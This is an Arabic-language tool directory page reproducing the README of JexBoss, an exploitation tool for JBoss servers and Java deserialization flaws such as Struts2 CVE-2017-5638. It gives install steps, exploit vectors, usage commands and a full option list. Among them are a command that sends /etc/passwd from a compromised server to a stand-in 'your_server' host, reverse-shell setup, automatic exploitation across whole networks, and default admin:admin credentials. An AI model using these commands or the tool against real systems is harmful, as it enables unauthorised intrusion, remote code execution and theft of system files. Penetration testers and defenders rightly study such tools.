Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
jexboss — JexBoss: أداة التحقق من واستغلال Jboss (وثغرات إلغاء التسلسل في Java) | Kitploit
أدوات/GitHubGitHub/joaomatosf/jexboss
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjoaomatosf/jexboss

jexboss

JexBoss: أداة التحقق من واستغلال Jboss (وثغرات إلغاء التسلسل في Java)

عرض المستودع
2.5k6408منذ 9 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

JexBoss - أداة للتحقق واستغلال ثغرات إلغاء تسلسل Java في JBoss (وغيرها)

JexBoss هي أداة لاختبار واستغلال الثغرات الأمنية في خادم تطبيقات JBoss ومنصات Java، وأطر العمل، والتطبيقات الأخرى.

المتطلبات

  • Python >= 2.7.x
  • urllib3
  • ipaddress

التثبيت على Linux\Mac

لتثبيت أحدث إصدار من JexBoss، يرجى استخدام الأوامر التالية:

root@kitploit:~
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

أو:

قم بتنزيل أحدث إصدار من: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

إذا كنت تستخدم CentOS مع Python 2.6، يرجى تثبيت Python2.7. مثال على تثبيت Python 2.7 على CentOS باستخدام Collections Software scl:

root@kitploit:~
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

التثبيت على Windows

إذا كنت تستخدم Windows، يمكنك استخدام Git Bash لتشغيل JexBoss. اتبع الخطوات التالية:

  • قم بتنزيل وتثبيت Python
  • قم بتنزيل وتثبيت Git for Windows
  • بعد التثبيت، قم بتشغيل Git for Windows واكتب الأوامر التالية:
root@kitploit:~
    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

الميزات

تم تطوير واختبار الأداة والاستغلالات من أجل:

  • إصدارات خادم تطبيقات JBoss: 3 و4 و5 و6.
  • ثغرات إلغاء تسلسل Java في العديد من أطر العمل والمنصات والتطبيقات (على سبيل المثال، Java Server Faces - JSF، Seam Framework، RMI عبر HTTP، Jenkins CLI RCE (CVE-2015-5317)، Remote JMX (CVE-2016-3427، CVE-2016-8735)، إلخ)

نواقل الاستغلال هي:

  • /admin-console
    • تم اختباره ويعمل في إصدارات JBoss 5 و6
  • /jmx-console
    • تم اختباره ويعمل في إصدارات JBoss 4 و5 و6
  • /web-console/Invoker
    • تم اختباره ويعمل في إصدارات JBoss 4 و5 و6
  • /invoker/JMXInvokerServlet
    • تم اختباره ويعمل في إصدارات JBoss 4 و5 و6
  • Application Deserialization
    • تم اختباره ويعمل ضد العديد من تطبيقات ومنصات Java، عبر معاملات HTTP POST
  • Servlet Deserialization
    • تم اختباره ويعمل ضد العديد من تطبيقات ومنصات Java، عبر servlets التي تعالج الكائنات المسلسلة (على سبيل المثال، عندما ترى "Invoker" في رابط)
  • Apache Struts2 CVE-2017-5638
    • تم اختباره في تطبيقات Apache Struts 2
  • أخرى

فيديوهات

  • استغلال ثغرات إلغاء تسلسل Java (RCE) في تطبيقات JSF/Seam عبر javax.faces.ViewState باستخدام JexBoss

Alt text

  • استغلال خادم تطبيقات JBoss باستخدام JexBoss

Alt text

  • استغلال Apache Struts2 (RCE) باستخدام Jexboss (CVE-2017-5638)

Alt text

لقطات الشاشة

  • أمثلة استخدام بسيطة:
root@kitploit:~
$ python jexboss.py

alt tag

  • مثال على الوضع المستقل ضد JBoss:
root@kitploit:~
$ python jexboss.py -u http://192.168.0.26:8080

alt tag alt tag

  • أوضاع الاستخدام:
root@kitploit:~
$ python jexboss.py -h
  • وضع فحص الشبكة:
root@kitploit:~
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

alt tag

  • وضع فحص الشبكة مع الاستغلال التلقائي:
root@kitploit:~
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

alt tag

  • النتائج والتوصيات:

alt tag

Reverse Shell (دمج meterpreter)

بعد استغلال خادم JBoss، يمكنك استخدام واجهة الأوامر الخاصة بـ jexboss نفسها أو إجراء اتصال عكسي باستخدام الأمر التالي:

root@kitploit:~
   jexremote=YOUR_IP:YOUR_PORT

   مثال:
     Shell>jexremote=192.168.0.10:4444
  • مثال: alt tag

عند استغلال ثغرات إلغاء تسلسل Java (Application Deserialization، Servlet Deserialization)، تكون الخيارات الافتراضية: إجراء اتصال عكسي (reverse shell) أو إرسال أمر لتنفيذه.

أمثلة الاستخدام

  • لثغرات إلغاء تسلسل Java في معامل HTTP مخصص ولإرسال أمر مخصص لتنفيذه على الخادم المخترق:
root@kitploit:~
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
  • لثغرات إلغاء تسلسل Java في معامل HTTP مخصص ولإجراء اتصال عكسي (سيطلب عنوان IP ومنفذ المضيف البعيد):
root@kitploit:~
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • لثغرات إلغاء تسلسل Java في Servlet (مثل Invoker):
root@kitploit:~
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • لـ Apache Struts 2 (CVE-2017-5638)
root@kitploit:~
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • لـ Apache Struts 2 (CVE-2017-5638) مع الكوكيز للموارد المحمية
root@kitploit:~
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • وضع الفحص التلقائي:
root@kitploit:~
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • وضع فحص الملف:
root@kitploit:~
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • خيارات إضافية:
root@kitploit:~
optional arguments:
  -h, --help            عرض رسالة المساعدة هذه والخروج
  --version             عرض رقم إصدار البرنامج والخروج
  --auto-exploit, -A    إرسال كود الاستغلال تلقائيًا (استخدم فقط إذا كان لديك إذن!!!)
  --disable-check-updates, -D
                        تعطيل فحصين للتحديثات: 1) فحص التحديثات التي تقوم بها webshell في الخادم المخترق في
                        http://webshell.jexboss.net/jsp_version.txt و 2) فحص التحديثات التي يقوم بها عميل jexboss في
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        وضع التشغيل (الافتراضي: standalone)
  --app-unserialize, -j
                        فحص ثغرات إلغاء تسلسل Java في معاملات HTTP (مثل javax.faces.ViewState، oldFormData، إلخ)
  --servlet-unserialize, -l
                        فحص ثغرات إلغاء تسلسل Java في Servlets (مثل واجهات Invoker)
  --jboss               فحص فقط لنواقل JBOSS.
  --jenkins             فحص فقط لـ Jenkins CLI vector.
  --jmxtomcat           فحص JMX JmxRemoteLifecycleListener في Tomcat
                        (CVE-2016-8735 و CVE-2016-8735). ملاحظة: لن يتم فحصه افتراضيًا.
  --proxy PROXY, -P PROXY
                        استخدام وكيل http للاتصال بالهدف (مثال -P http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        بيانات اعتماد الوكيل (مثال -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        تسجيل دخول وكلمة مرور JBoss لاستغلال admin-console في JBoss 5 و JBoss 6 (الافتراضي: admin:admin)
  --timeout TIMEOUT     عدد الثواني قبل انتهاء مهلة الاتصال (الافتراضي 3)

الوضع المستقل:
  -host HOST, -u HOST   عنوان المضيف المراد فحصه (مثال -u http://192.168.0.10:8080)

خيارات متقدمة (استخدم عند استغلال JAVA UNSERIALIZE في طبقة التطبيق):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        عنوان ومنفذ المضيف البعيد للـ reverse shell عند استغلال ثغرات إلغاء تسلسل Java
                        في طبقة التطبيق (حاليًا يعمل فقط ضد أنظمة *nix)(مثال 192.168.0.10:1331)
  --cmd CMD, -x CMD     إرسال أمر محدد لتنفيذه على الهدف (مثال curl -d @/etc/passwd http://your_server)
  --windows, -w         يحدد أن الأوامر موجهة لأنظمة Windows (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        تحديد المعامل للبحث وحقن الكائنات المسلسلة فيه. (أمثلة -H javax.faces.ViewState أو -H
                        oldFormData (<- Hi PayPal =X) أو غيرها) (الافتراضي: javax.faces.ViewState)
  --show-payload, -t    طباعة الحمولة المُنشأة.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        تحديد نوع الـ Gadget لإنشاء الحمولة تلقائيًا. (الافتراضي: commons-collections3.1 أو
                        groovy1 لـ JenKins)
  --load-gadget FILENAME
                        توفير gadget خاص بك من ملف (كائن Java مسلسل في وضع RAW)
  --force, -F           فرض إرسال gadgets Java المسلسلة إلى عنوان URL المحدد في المعامل -u. سيرسل الحمولة
                        بتنسيقات متعددة (مثل RAW، GZIPED و BASE64) وبأنواع Content-Type مختلفة.

وضع الفحص التلقائي:
  -network NETWORK      الشبكة المراد فحصها بصيغة CIDR (مثال 10.0.0.0/8)
  -ports PORTS          قائمة بالمنافذ مفصولة بفواصل لفحصها لكل مضيف (مثال 8080,8443,8888,80,443)
  -results FILENAME     اسم الملف لتخزين نتائج الفحص التلقائي

وضع فحص الملف:
  -file FILENAME_HOSTS  اسم ملف يحتوي على قائمة المضيفين المراد فحصهم (مضيف واحد في كل سطر)
  -out FILENAME_RESULTS
                        اسم الملف لتخزين نتائج فحص الملف

أسئلة، مشاكل، اقتراحات، إلخ:

  • [email protected]
تنزيل الأداة